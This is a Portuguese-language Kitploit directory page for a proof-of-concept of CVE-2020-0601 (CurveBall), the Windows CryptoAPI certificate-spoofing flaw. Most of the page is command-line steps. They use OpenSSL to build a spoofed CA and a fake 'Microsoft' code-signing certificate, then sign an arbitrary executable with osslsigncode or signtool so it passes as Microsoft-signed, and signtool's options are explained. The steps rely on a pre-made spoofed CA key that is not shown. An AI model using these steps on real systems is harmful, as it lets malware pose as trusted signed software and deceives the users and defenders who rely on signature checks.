Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-0601 — PoC para CVE-2020-0601- Windows CryptoAPI (Crypt32.dll) POC: https://github.com/ollypwn/CurveBall | Kitploit
Ferramentas/GitHubGitHub/yanghaoi/cve-2020-0601
Geração de PayloadsAnálise de VulnerabilidadesAnálise de CódigoExploraçãoCriptografiaExploração de Binários
GitHubyanghaoi/cve-2020-0601

CVE-2020-0601

PoC para CVE-2020-0601- Windows CryptoAPI (Crypt32.dll) POC: https://github.com/ollypwn/CurveBall

Ver Repositório
12há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2020-0601

PoC para CVE-2020-0601 - Windows CryptoAPI (Crypt32.dll) POC: https://github.com/ollypwn/CurveBall

No kali:

  1. Crie o arquivo PKCS12
root@kitploit:~
openssl req -new -x509 -key spoofed_ca.key -out spoofed_ca.crt

openssl ecparam -name secp384r1 -genkey -noout -out Microsoft.key

openssl req -new -key Microsoft.key -out Microsoft.csr -config openssl_cs.conf -reqexts v3_cs

openssl x509 -req -in Microsoft.csr -CA spoofed_ca.crt -CAkey spoofed_ca.key -CAcreateserial -out Microsoft.crt -days 50000 -extfile openssl_cs.conf -extensions v3_cs

openssl pkcs12 -export -in Microsoft.crt -inkey Microsoft.key -certfile spoofed_ca.crt -name "Code Signing" -out Microsoft.p12

outPk12 2. Assine o arquivo:

root@kitploit:~
osslsigncode sign -pkcs12 Microsoft.p12 -n "Signed by DiDi" -pass 123 -in c1.exe -out c1_Microsoft_signed.exe

Assinar arquivo

  1. No Windows use o signtool para assinar o arquivo, localizado em "C:\Program Files (x86)\Microsoft SDKs\ClickOnce\SignTool\signtool.exe":
root@kitploit:~
signtool sign /v /f Microsoft.p12 /tr http://timestamp.digicert.com /as /fd sha256 /p 123 c1.exe

signtool.exe

Opções globais da linha de comando do signtool.exe: /v Exibe saída detalhada e mensagens de aviso, independentemente de o comando ter sido executado com sucesso. Opções do comando sign: /f Especifica o certificado de assinatura contido no arquivo. Se o arquivo estiver no formato Personal Information Exchange (PFX) e for protegido por senha, use a opção /p para especificar a senha. Se o arquivo não contiver a chave privada, use as opções /csp e /kc para especificar o CSP e o nome do contêiner da chave privada. /tr Especifica a URL do servidor de carimbo de data/hora RFC 3161. Se essa opção (ou /t) não estiver presente, nenhuma operação de carimbo de data/hora será executada no arquivo assinado. Se a operação de carimbo de data/hora falhar, um aviso será gerado. Esta opção não pode ser usada junto com a opção /t. /as Acrescenta esta assinatura. Se não houver uma assinatura primária, esta se tornará a assinatura primária. /fd Especifica o algoritmo de hash do arquivo a ser usado para criar a assinatura do arquivo. O valor padrão é SHA1. /p Especifica a senha a ser usada ao abrir o arquivo PFX. (Use a opção /f para especificar o arquivo PFX.)

Baixar ferramenta